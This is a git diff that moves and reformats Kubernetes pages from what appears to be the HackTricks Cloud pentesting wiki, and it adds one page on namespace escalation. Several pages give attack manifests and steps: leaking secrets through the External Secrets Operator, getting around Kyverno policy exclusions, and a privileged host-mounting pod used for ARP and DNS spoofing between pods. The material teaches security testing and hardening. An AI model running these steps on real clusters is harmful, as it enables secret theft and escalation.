rename from pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
index 446545efb..321b2d32d 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
@@ -32,8 +32,6 @@ kubectl get externalsecret -A | grep mystore
 
 _This resource is namespace scoped so unless you already know which namespace to look for, add the -A option to look across all namespaces._
 
-
-
 You should get a list of defined externalsecret. Let's assume you found an externalsecret object called _**mysecret**_ defined and used by namespace _**mynamespace**_. Gather a bit more information about what kind of secret it holds.
 
 ```sh
@@ -63,9 +61,9 @@ spec:
 
 So far we got:
 
-* Name a ClusterSecretStore
-* Name of an ExternalSecret
-* Name of  the secret
+- Name a ClusterSecretStore
+- Name of an ExternalSecret
+- Name of the secret
 
 Now that we have everything we need, you can create an ExternalSecret (and eventually patch/create a new Namespace to comply with prerequisites needed to get your new secret synced ):
 
@@ -76,11 +74,11 @@ metadata:
   namespace: evilnamespace
 spec:
   data:
-  - remoteRef:
-      conversionStrategy: Default
-      decodingStrategy: None
-      key: SECRET_KEY
-    secretKey: SOME_PASSWORD
+    - remoteRef:
+        conversionStrategy: Default
+        decodingStrategy: None
+        key: SECRET_KEY
+      secretKey: SOME_PASSWORD
   refreshInterval: 30s
   secretStoreRef:
     kind: ClusterSecretStore
@@ -92,15 +90,15 @@ spec:
 ```
 
 ```yaml
- kind: Namespace
- metadata:
-   annotations:
-     required_annotation: value
-     other_required_annotation: other_value
-   labels:
-     required_label: somevalue
-     other_required_label: someothervalue
-   name: evilnamespace
+kind: Namespace
+metadata:
+  annotations:
+    required_annotation: value
+    other_required_annotation: other_value
+  labels:
+    required_label: somevalue
+    other_required_label: someothervalue
+  name: evilnamespace
 ```
 
 After a few mins, if sync conditions were met, you should be able to view the leaked secret inside your namespace
@@ -109,10 +107,12 @@ After a few mins, if sync conditions were met, you should be able to view the le
 kubectl get secret leaked_secret -o yaml
 ```
 
-
-
 ## References
 
-{% embed url="https://external-secrets.io/latest/" %}
+{{#ref}}
+https://external-secrets.io/latest/
+{{#endref}}
 
-{% embed url="https://github.com/external-secrets/external-secrets" %}
+{{#ref}}
+https://github.com/external-secrets/external-secrets
+{{#endref}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
similarity index 66%
rename from pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
index 87d58ffac..52528aaee 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
@@ -1,19 +1,6 @@
 # Kubernetes Hardening
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Tools to analyse a cluster
 
@@ -30,10 +17,10 @@ kubescape scan --verbose
 The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
 You can choose to:
 
-* run kube-bench from inside a container (sharing PID namespace with the host)
-* run a container that installs kube-bench on the host, and then run kube-bench directly on the host
-* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases),
-* compile it from source.
+- run kube-bench from inside a container (sharing PID namespace with the host)
+- run a container that installs kube-bench on the host, and then run kube-bench directly on the host
+- install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases),
+- compile it from source.
 
 ### [**Kubeaudit**](https://github.com/Shopify/kubeaudit)
 
@@ -67,15 +54,15 @@ kube-hunter --remote some.node.com
 
 [**Mkat**](https://github.com/DataDog/managed-kubernetes-auditing-toolkit) is a tool built to test other type of high risk checks compared with the other tools. It mainly have 3 different modes:
 
-* **`find-role-relationships`**: Which will find which AWS roles are running in which pods
-* **`find-secrets`**: Which tries to identify secrets in K8s resources such as Pods, ConfigMaps, and Secrets.
-* **`test-imds-access`**: Which will try to run pods and try to access the metadata v1 and v2. WARNING: This will run a pod in the cluster, be very careful because maybe you don't want to do this!
+- **`find-role-relationships`**: Which will find which AWS roles are running in which pods
+- **`find-secrets`**: Which tries to identify secrets in K8s resources such as Pods, ConfigMaps, and Secrets.
+- **`test-imds-access`**: Which will try to run pods and try to access the metadata v1 and v2. WARNING: This will run a pod in the cluster, be very careful because maybe you don't want to do this!
 
 ## **Audit IaC Code**
 
 ### [**Popeye**](https://github.com/derailed/popeye)
 
-[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive \_over\_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
+[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive \_over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
 
 ### [**KICS**](https://github.com/Checkmarx/kics)
 
@@ -106,9 +93,9 @@ To install:
 
 You can configure the **security context of the Pods** (with _PodSecurityContext_) and of the **containers** that are going to be run (with _SecurityContext_). For more information read:
 
-{% content-ref url="kubernetes-securitycontext-s.md" %}
-[kubernetes-securitycontext-s.md](kubernetes-securitycontext-s.md)
-{% endcontent-ref %}
+{{#ref}}
+kubernetes-securitycontext-s.md
+{{#endref}}
 
 ### Kubernetes API Hardening
 
@@ -120,17 +107,17 @@ User or K8s ServiceAccount –> Authentication –> Authorization –> Admission
 
 **Tips**:
 
-* Close ports.
-* Avoid Anonymous access.
-* NodeRestriction; No access from specific nodes to the API.
-  * [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
-  * Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
-  * And also, allows kubelets to add/remove/update these labels and label prefixes.
-* Ensure with labels the secure workload isolation.
-* Avoid specific pods from API access.
-* Avoid ApiServer exposure to the internet.
-* Avoid unauthorized access RBAC.
-* ApiServer port with firewall and IP whitelisting.
+- Close ports.
+- Avoid Anonymous access.
+- NodeRestriction; No access from specific nodes to the API.
+  - [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
+  - Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
+  - And also, allows kubelets to add/remove/update these labels and label prefixes.
+- Ensure with labels the secure workload isolation.
+- Avoid specific pods from API access.
+- Avoid ApiServer exposure to the internet.
+- Avoid unauthorized access RBAC.
+- ApiServer port with firewall and IP whitelisting.
 
 ### SecurityContext Hardening
 
@@ -162,39 +149,26 @@ spec:
       allowPrivilegeEscalation: true
 ```
 
-* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
-* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
+- [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+- [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
 
 ### General Hardening
 
 You should update your Kubernetes environment as frequently as necessary to have:
 
-* Dependencies up to date.
-* Bug and security patches.
+- Dependencies up to date.
+- Bug and security patches.
 
 [**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch)
 
 **The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
 
-* Upgrade the Master Node components following this sequence:
-  * etcd (all instances).
-  * kube-apiserver (all control plane hosts).
-  * kube-controller-manager.
-  * kube-scheduler.
-  * cloud controller manager, if you use one.
-* Upgrade the Worker Node components such as kube-proxy, kubelet.
+- Upgrade the Master Node components following this sequence:
+  - etcd (all instances).
+  - kube-apiserver (all control plane hosts).
+  - kube-controller-manager.
+  - kube-scheduler.
+  - cloud controller manager, if you use one.
+- Upgrade the Worker Node components such as kube-proxy, kubelet.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
similarity index 83%
rename from pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
index 12734b41b..f9083020d 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
@@ -1,19 +1,6 @@
 # Kubernetes SecurityContext(s)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## PodSecurityContext 
 
@@ -21,10 +8,10 @@ Learn & practice GCP Hacking: fsGroup
integer
                                                                                                                                                                                                                                                 | 
A special supplemental group that applies to all containers in a pod. Some volume types allow the Kubelet to change the ownership of that volume to be owned by the pod:
1. The owning GID will be the FSGroup
2. The setgid bit is set (new files created in the volume will be owned by FSGroup)
3. The permission bits are OR'd with rw-rw---- If unset, the Kubelet will not modify the ownership and permissions of any volume
 |
 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -44,45 +31,32 @@ When specifying the security context of a Pod you can use several attributes. Fr
 
 This context is set inside the **containers definitions**. From a defensive security point of view you should consider:
 
-* **allowPrivilegeEscalation** to **False**
-* Do not add sensitive **capabilities** (and remove the ones you don't need)
-* **privileged** to **False**
-* If possible, set **readOnlyFilesystem** as **True**
-* Set **runAsNonRoot** to **True** and set a **runAsUser**
-* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile**
-* Do **NOT** give **privilege** **group** access via **runAsGroup.**
+- **allowPrivilegeEscalation** to **False**
+- Do not add sensitive **capabilities** (and remove the ones you don't need)
+- **privileged** to **False**
+- If possible, set **readOnlyFilesystem** as **True**
+- Set **runAsNonRoot** to **True** and set a **runAsUser**
+- If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile**
+- Do **NOT** give **privilege** **group** access via **runAsGroup.**
 
 Note that the attributes set in **both SecurityContext and PodSecurityContext**, the value specified in **SecurityContext** takes **precedence**.
 
-| 
allowPrivilegeEscalation
boolean
                                                                                                                                                                      | **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no\_new\_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP\_SYS\_ADMIN** |
-| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| 
capabilities
Capabilities
More info about Capabilities
  | The **capabilities to add/drop when running containers**. Defaults to the default set of capabilities.                                                                                                                                                                                                                    |
-| 
privileged
boolean
                                                                                                                                                                                    | Run container in privileged mode. Processes in privileged containers are essentially **equivalent to root on the host**. Defaults to false.                                                                                                                                                                               |
-| 
procMount
string
                                                                                                                                                                                      | procMount denotes the **type of proc mount to use for the containers**. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths.                                                                                                                                    |
-| 
readOnlyRootFilesystem
boolean
                                                                                                                                                                        | Whether this **container has a read-only root filesystem**. Default is false.                                                                                                                                                                                                                                             |
-| 
runAsGroup
integer
                                                                                                                                                                                    | The **GID to run the entrypoint** of the container process. Uses runtime default if unset.                                                                                                                                                                                                                                |
-| 
runAsNonRoot
boolean
                                                                                                                                                                                  | Indicates that the container must **run as a non-root user**. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does.                                                                                                          |
-| 
runAsUser
integer
                                                                                                                                                                                     | The **UID to run the entrypoint** of the container process. Defaults to user specified in image metadata if unspecified.                                                                                                                                                                                                  |
-| 
seLinuxOptions
SELinuxOptions
More info about seLinux
 | The **SELinux context to be applied to the container**. If unspecified, the container runtime will allocate a random SELinux context for each container.                                                                                                                                                                  |
-| 
seccompProfile
SeccompProfile
                                                               | The **seccomp options** to use by this container.                                                                                                                                                                                                                                                                         |
-| 
windowsOptions
WindowsSecurityContextOptions
                                 | The **Windows specific settings** applied to all containers.                                                                                                                                                                                                                                                              |
+| 
allowPrivilegeEscalation
boolean
                                                                                                                                                                      | **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP_SYS_ADMIN** |
+| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| 
capabilities
Capabilities
More info about Capabilities
  | The **capabilities to add/drop when running containers**. Defaults to the default set of capabilities.                                                                                                                                                                                                                |
+| 
privileged
boolean
                                                                                                                                                                                    | Run container in privileged mode. Processes in privileged containers are essentially **equivalent to root on the host**. Defaults to false.                                                                                                                                                                           |
+| 
procMount
string
                                                                                                                                                                                      | procMount denotes the **type of proc mount to use for the containers**. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths.                                                                                                                                |
+| 
readOnlyRootFilesystem
boolean
                                                                                                                                                                        | Whether this **container has a read-only root filesystem**. Default is false.                                                                                                                                                                                                                                         |
+| 
runAsGroup
integer
                                                                                                                                                                                    | The **GID to run the entrypoint** of the container process. Uses runtime default if unset.                                                                                                                                                                                                                            |
+| 
runAsNonRoot
boolean
                                                                                                                                                                                  | Indicates that the container must **run as a non-root user**. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does.                                                                                                      |
+| 
runAsUser
integer
                                                                                                                                                                                     | The **UID to run the entrypoint** of the container process. Defaults to user specified in image metadata if unspecified.                                                                                                                                                                                              |
+| 
seLinuxOptions
SELinuxOptions
More info about seLinux
 | The **SELinux context to be applied to the container**. If unspecified, the container runtime will allocate a random SELinux context for each container.                                                                                                                                                              |
+| 
seccompProfile
SeccompProfile
                                                               | The **seccomp options** to use by this container.                                                                                                                                                                                                                                                                     |
+| 
windowsOptions
WindowsSecurityContextOptions
                                 | The **Windows specific settings** applied to all containers.                                                                                                                                                                                                                                                          |
 
 ## References
 
-* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)
-* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)
+- [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)
+- [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
similarity index 100%
rename from pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
similarity index 78%
rename from pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
index ef10afd6d..635343b6c 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
@@ -17,11 +17,11 @@ $ kubectl get policies
 
 For each ClusterPolicy and Policy, you can specify a list of excluded entities, including:
 
-* Groups: `excludedGroups`
-* Users: `excludedUsers`
-* Service Accounts (SA): `excludedServiceAccounts`
-* Roles: `excludedRoles`
-* Cluster Roles: `excludedClusterRoles`
+- Groups: `excludedGroups`
+- Users: `excludedUsers`
+- Service Accounts (SA): `excludedServiceAccounts`
+- Roles: `excludedRoles`
+- Cluster Roles: `excludedClusterRoles`
 
 These excluded entities will be exempt from the policy requirements, and Kyverno will not enforce the policy for them.
 
@@ -37,17 +37,16 @@ Look for the excluded entities : 
 
 ```yaml
 exclude:
-      any:
-      - clusterRoles:
+  any:
+    - clusterRoles:
         - cluster-admin
-      - subjects:
+    - subjects:
         - kind: User
           name: system:serviceaccount:DUMMYNAMESPACE:admin
         - kind: User
           name: system:serviceaccount:TEST:thisisatest
         - kind: User
           name: system:serviceaccount:AHAH:*
-          
 ```
 
 Within a cluster, numerous added components, operators, and applications may necessitate exclusion from a cluster policy. However, this can be exploited by targeting privileged entities. In some cases, it may appear that a namespace does not exist or that you lack permission to impersonate a user, which can be a sign of misconfiguration.
@@ -56,7 +55,6 @@ Within a cluster, numerous added components, operators, and applications may nec
 
 Another way to bypass policies is to focus on the ValidatingWebhookConfiguration resource : 
 
-{% content-ref url="../kubernetes-validatingwebhookconfiguration.md" %}
-[kubernetes-validatingwebhookconfiguration.md](../kubernetes-validatingwebhookconfiguration.md)
-{% endcontent-ref %}
-
+{{#ref}}
+../kubernetes-validatingwebhookconfiguration.md
+{{#endref}}
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md b/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
new file mode 100644
index 000000000..b0ddbb10b
--- /dev/null
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
@@ -0,0 +1,33 @@
+# Kubernetes Namespace Escalation
+
+{{#include ../../banners/hacktricks-training.md}}
+
+In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
+
+Here are some techniques you can try to escape to a different namespace:
+
+### Abuse K8s privileges
+
+Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
+
+For more info about which privileges you can abuse read:
+
+{{#ref}}
+abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
+
+### Escape to the node
+
+If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
+
+- Check for **SAs tokens mounted in other docker containers** running in the node
+- Check for new **kubeconfig files in the node with extra permissions** given to the node
+- If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet)
+
+All these techniques are explained in:
+
+{{#ref}}
+attacking-kubernetes-from-inside-a-pod.md
+{{#endref}}
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md b/src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
similarity index 61%
rename from pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
index 51aeb99e3..cf2940aa7 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
@@ -1,19 +1,6 @@
 # Kubernetes Network Attacks
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Introduction
 
@@ -23,10 +10,10 @@ ARP spoofing attacks involve the **attacker sending falsified ARP** (Address Res
 
 In the scenario 4 machines are going to be created:
 
-* ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack)
-* **ubuntu-attack**: **Malicious** container in default namespace
-* **ubuntu-victim**: **Victim** machine in kube-system namespace
-* **mysql**: **Victim** machine in default namespace
+- ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack)
+- **ubuntu-attack**: **Malicious** container in default namespace
+- **ubuntu-victim**: **Victim** machine in kube-system namespace
+- **mysql**: **Victim** machine in default namespace
 
 ```yaml
 echo 'apiVersion: v1
@@ -35,27 +22,27 @@ metadata:
   name: ubuntu-pe
 spec:
   containers:
-  - image: ubuntu
-    command:
-      - "sleep"
-      - "360000" 
-    imagePullPolicy: IfNotPresent
-    name: ubuntu-pe
-    securityContext:
-      allowPrivilegeEscalation: true
-      privileged: true
-      runAsUser: 0 
-    volumeMounts:
-    - mountPath: /host
-      name: host-volume
-  restartPolicy: Never 
-  hostIPC: true 
-  hostNetwork: true 
-  hostPID: true 
+    - image: ubuntu
+      command:
+        - "sleep"
+        - "360000"
+      imagePullPolicy: IfNotPresent
+      name: ubuntu-pe
+      securityContext:
+        allowPrivilegeEscalation: true
+        privileged: true
+        runAsUser: 0
+      volumeMounts:
+        - mountPath: /host
+          name: host-volume
+  restartPolicy: Never
+  hostIPC: true
+  hostNetwork: true
+  hostPID: true
   volumes:
-  - name: host-volume
-    hostPath:
-      path: /
+    - name: host-volume
+      hostPath:
+        path: /
 ---
 apiVersion: v1
 kind: Pod
@@ -65,12 +52,12 @@ metadata:
     app: ubuntu
 spec:
   containers:
-  - image: ubuntu
-    command:
-      - "sleep"
-      - "360000" 
-    imagePullPolicy: IfNotPresent
-    name: ubuntu-attack
+    - image: ubuntu
+      command:
+        - "sleep"
+        - "360000"
+      imagePullPolicy: IfNotPresent
+      name: ubuntu-attack
   restartPolicy: Never
 ---
 apiVersion: v1
@@ -80,12 +67,12 @@ metadata:
   namespace: kube-system
 spec:
   containers:
-  - image: ubuntu
-    command:
-      - "sleep"
-      - "360000" 
-    imagePullPolicy: IfNotPresent
-    name: ubuntu-victim
+    - image: ubuntu
+      command:
+        - "sleep"
+        - "360000"
+      imagePullPolicy: IfNotPresent
+      name: ubuntu-victim
   restartPolicy: Never
 ---
 apiVersion: v1
@@ -94,14 +81,14 @@ metadata:
   name: mysql
 spec:
   containers:
-  - image: mysql:5.6
-    ports:
-      - containerPort: 3306
-    imagePullPolicy: IfNotPresent
-    name: mysql
-    env:
-      - name: MYSQL_ROOT_PASSWORD
-        value: mysql
+    - image: mysql:5.6
+      ports:
+        - containerPort: 3306
+      imagePullPolicy: IfNotPresent
+      name: mysql
+      env:
+        - name: MYSQL_ROOT_PASSWORD
+          value: mysql
   restartPolicy: Never' | kubectl apply -f -
 ```
 
@@ -121,9 +108,8 @@ Generally speaking, **pod-to-pod networking inside the node** is available via a
 
 This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).
 
-{% hint style="warning" %}
-Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**
-{% endhint %}
+> [!WARNING]
+> Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**
 
 ### DNS
 
@@ -167,13 +153,12 @@ However, the pod **doesn't know** how to get to that **address** because the **p
 
 Therefore, the pod will send the **DNS requests to the address 10.96.0.10** which will be **translated** by the cbr0 **to** **172.17.0.2**.
 
-{% hint style="warning" %}
-This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod.
-
-Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**).
-
-Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
-{% endhint %}
+> [!WARNING]
+> This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod.
+>
+> Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**).
+>
+> Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
 
